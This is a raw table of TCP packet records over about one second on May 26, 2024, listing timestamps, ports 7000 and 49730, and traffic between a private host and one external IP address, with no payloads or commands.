May 26, 2024 01:21:25.882261992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.882314920 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.883732080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.883768082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.883802891 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.885247946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.885282993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.885400057 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.886758089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.886794090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.886827946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.886837959 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.886943102 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.888200045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.888236046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.888365984 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.889578104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.889614105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.889647007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.889756918 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.890948057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.890984058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.891105890 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.892215014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.892251015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.892298937 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.893472910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.893508911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.893542051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.893616915 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.893652916 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.894690990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.894726992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.894804001 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.895911932 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.895946980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.895981073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.896038055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.902071953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.902209044 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.902374983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.903038025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.903496981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.903644085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.903680086 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.903808117 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.904334068 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.904370070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.904439926 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.906796932 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.907020092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.907202959 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.907432079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.907892942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.907984972 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.908476114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.908525944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.908606052 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.909517050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.909554958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.909660101 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.910500050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.911051989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.911087036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.911120892 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.911123037 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.911185026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.912076950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.912112951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.913115025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.913177967 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.913660049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.913695097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.913718939 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.914741039 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.914778948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.914823055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.915708065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.915744066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.915780067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.915783882 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.915837049 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.916691065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.916728020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.916928053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.917639017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.917675018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.917783976 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.918632030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.918668032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.918781996 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.919540882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.919576883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.919625998 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.919681072 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.920496941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.920536041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.920578003 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.921188116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.921221972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.921278000 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.934987068 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.935092926 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.935141087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.935560942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.935631037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.935772896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.935878992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.935940981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.936305046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.936625004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.936681032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.938797951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.938868046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.938931942 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.938983917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.939357042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.939729929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.939795971 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.940099955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.940157890 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.940448999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.940653086 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.940686941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.940745115 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.941379070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.941443920 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.941745043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.942131996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.942534924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.942572117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.942605019 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.942640066 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.943227053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.943660021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.943694115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.943728924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.943758011 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.943793058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.945226908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.948746920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.948831081 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.948923111 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.949309111 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.949353933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.949630022 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.949971914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.950050116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.950352907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.950387955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.950467110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.951042891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.951426029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.951459885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.951493025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.951493025 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.951566935 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.952117920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.952152967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.952315092 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.952831984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.952866077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.952924013 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.953530073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.953564882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.953625917 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.954211950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.954248905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.954282045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.954338074 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.954941988 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.954973936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.955024004 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.955621958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.955656052 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.955749035 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.956301928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.956365108 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.956671953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.956707001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.957375050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.957439899 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.957741022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.957775116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.957803011 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.957808018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.958525896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.958559990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.958631992 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.958664894 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.959152937 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.959187984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.959285021 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.959829092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.960175037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.960208893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.960300922 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.960887909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.960923910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.960967064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.960972071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.961232901 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.961564064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.993033886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.993211985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.993268013 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.993376970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.993419886 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.993633032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.993877888 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.994035006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.994203091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.994364977 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.997682095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.997719049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.997901917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.997914076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.997936964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.998209953 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.998347044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.998688936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.998789072 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.998811007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.999401093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.999929905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.999963045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.999994040 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.000029087 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.000062943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.000667095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.000725985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.000857115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.001422882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.001585960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.001646042 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.002165079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.002223015 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.002306938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.002676010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.002888918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.002949953 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.003647089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.003761053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.003768921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.004379988 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.004497051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.004560947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.005150080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.005244970 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.005285978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.005868912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.006659031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.006692886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.006726980 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.006763935 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.006792068 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.007391930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.007498026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.007549047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.007795095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.008037090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.008081913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.008857012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.008960962 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.009011030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.009573936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.009677887 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.012554884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.026050091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.026223898 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.026473999 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.026571989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.026869059 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.026937962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.026973009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.027704000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.027785063 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.027846098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.027903080 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.029803038 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.030347109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.030383110 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.030457020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.030570030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.030792952 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.030900002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.031316996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.031577110 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.031642914 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.031749010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.031807899 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.032399893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.032541037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.033106089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.033202887 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.033246994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.033329964 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.033700943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.033868074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.033977032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.034214020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.034586906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.034621000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.034712076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.034748077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.034836054 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.035466909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.035588026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.035906076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.035972118 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.036356926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.036438942 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.036497116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.036801100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.037064075 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.037167072 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.037326097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.037476063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.037554026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.038137913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.038224936 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.038443089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.038593054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.038866997 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.038940907 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.039355040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.039453983 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.039505005 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.040220976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.040255070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.040294886 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.040402889 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.040461063 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.040658951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.041124105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.041243076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.041455030 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.041546106 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.041610003 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.041807890 CEST	7000	49730	195.2.75.12	192.168.2.4
